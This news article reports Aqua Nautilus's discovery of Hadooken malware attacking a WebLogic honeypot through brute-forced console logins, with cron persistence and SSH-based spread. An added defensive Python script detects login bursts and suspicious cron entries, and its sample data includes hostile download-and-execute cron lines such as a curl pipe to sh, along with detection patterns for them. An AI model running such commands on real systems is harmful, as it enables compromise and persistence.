CyberSecurity SEE

Hadooken Malware Takes Aim at Oracle’s WebLogic Servers


Security researchers at Aqua Nautilus recently discovered a threat actor using a cryptominer and distributed denial-of-service (DDoS) malware to target Oracle WebLogic Servers with a malicious payload dubbed “Hadooken.”

The investigation began when Aqua Nautilus detected Hadooken in action on one of its honeypots last month. Further analysis showed that the threat actor gained access to Aqua's WebLogic honeypot by brute-forcing the administration console. The Hadooken payload, named after the Hadouken move from the Street Fighter video game series, was then dropped by two separate loaders, a Python script and a shell script (the latter named “c”), each written to run Hadooken on the compromised system and delete the file afterward.

Lead researcher Assaf Morag from Aqua explained that the shell script version of Hadooken also attempted to extract SSH data from various directories to target known servers and propagate the malware laterally across connected environments.

Oracle’s WebLogic Server is widely used by organizations for building and deploying Java applications, with deployments spanning various industries such as banking, healthcare, and manufacturing. The platform has been a frequent target for attacks due to critical vulnerabilities and configuration errors like weak passwords and exposed admin consoles.

In the attack on Aqua's honeypot, the threat actor got in by guessing a weak administrator password, then deployed Hadooken together with the Tsunami malware (used for DDoS attacks) and a cryptominer. The malware also installed cron jobs to keep its persistence on the compromised system.
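Two of the behaviours described above, a burst of login attempts against the administration console and cron entries that fetch and run a remote payload, are visible in ordinary host data. The following detection script is an added example, not code from Aqua's report or from the Hadooken campaign. The access-log lines and cron entries are constructed for the example; the login endpoint path (`/console/j_security_check`, the standard form-login target of the WebLogic console), the thresholds and the cron indicator patterns are assumptions that a practitioner would tune to their environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumption: the WebLogic console authenticates via the standard
# J2EE form-login target. Adjust if your deployment differs.
LOGIN_ENDPOINT = "/console/j_security_check"

# Constructed sample access log (Common Log Format). 203.0.113.5 hammers the
# login form eight times in 15 seconds; 198.51.100.2 is a normal admin login.
ACCESS_LOG = """\
203.0.113.5 - - [09/Sep/2024:10:00:01 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
203.0.113.5 - - [09/Sep/2024:10:00:03 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
203.0.113.5 - - [09/Sep/2024:10:00:05 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
203.0.113.5 - - [09/Sep/2024:10:00:07 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
203.0.113.5 - - [09/Sep/2024:10:00:09 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
203.0.113.5 - - [09/Sep/2024:10:00:11 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
203.0.113.5 - - [09/Sep/2024:10:00:13 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
203.0.113.5 - - [09/Sep/2024:10:00:15 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
198.51.100.2 - - [09/Sep/2024:10:00:20 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1432
198.51.100.2 - - [09/Sep/2024:10:00:31 +0000] "POST /console/j_security_check HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_console_bruteforce(lines, threshold=5, window_s=60):
    """Flag source IPs that POST to the login endpoint at least `threshold`
    times inside any sliding window of `window_s` seconds.

    Returns {ip: peak_attempts_in_window}. Status codes are deliberately
    ignored: a legitimate admin logs in a handful of times, so the rate of
    attempts alone is the signal, whatever the server answers.
    """
    attempts = defaultdict(deque)
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST" or rec["path"] != LOGIN_ENDPOINT:
            continue
        q = attempts[rec["ip"]]
        q.append(rec["ts"])
        # Drop attempts that fell out of the window.
        while q and (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


# Constructed cron entries as found in /etc/cron.d-style files (user field present).
CRON_ENTRIES = [
    "0 3 * * * root /usr/bin/apt-get update -q",
    "*/5 * * * * root curl -s http://198.51.100.7/y | sh",
    "@reboot root /dev/shm/.h >/dev/null 2>&1",
    "15 2 * * 0 root echo aGVsbG8= | base64 -d > /tmp/x && chmod +x /tmp/x && /tmp/x",
]

# Assumed indicators of download-and-execute persistence; order fixes the
# order of reasons reported per entry.
CRON_INDICATORS = [
    ("pipe_to_shell", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|da)?sh\b")),
    ("raw_ip_url", re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}")),
    ("base64_decode", re.compile(r"base64\s+(?:-d|--decode)\b")),
    ("world_writable_dir", re.compile(r"/(?:tmp|dev/shm|var/tmp)/")),
]


def flag_cron_entries(entries):
    """Return [(entry, [reasons])] for entries matching any indicator."""
    flagged = []
    for entry in entries:
        reasons = [name for name, rx in CRON_INDICATORS if rx.search(entry)]
        if reasons:
            flagged.append((entry, reasons))
    return flagged


if __name__ == "__main__":
    for ip, n in detect_console_bruteforce(ACCESS_LOG.splitlines()).items():
        print(f"console brute-force candidate: {ip} ({n} attempts in window)")
    for entry, reasons in flag_cron_entries(CRON_ENTRIES):
        print(f"suspicious cron entry [{', '.join(reasons)}]: {entry}")
```

On a real host, feed `detect_console_bruteforce` the WebLogic HTTP access log and `flag_cron_entries` the concatenated contents of `/etc/crontab`, `/etc/cron.d/*` and `/var/spool/cron/*`; the indicator list is a starting point, not a complete signature for any particular malware family.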

Aqua’s analysis indicated that while Tsunami was not actively utilized in the attack, there is a possibility of its usage in future stages. Furthermore, the threat actor could potentially modify Hadooken to target other Linux platforms beyond WebLogic Servers. The malware also showed links to Rhombus and NoEscape ransomware, though they were not deployed during the honeypot attack.

Hadooken was downloaded onto the compromised system from two IP addresses, one in Germany and one in Russia. Aqua noted that the German IP address had previously been associated with threat groups such as TeamTNT and the 8220 Gang, but there is no direct evidence linking those groups to the Hadooken campaign.

To combat threats like Hadooken, Aqua recommends organizations employ infrastructure-as-code scanning tools, cloud security posture management tools, Kubernetes security solutions, runtime security tools, and container security tools to enhance their security posture.

In conclusion, the emergence of Hadooken targeting Oracle WebLogic Servers underscores that attackers still reach critical infrastructure through basic weaknesses such as weak administrator passwords and exposed consoles. By remaining vigilant and applying the security measures above, enterprises can reduce the risk posed by such campaigns.
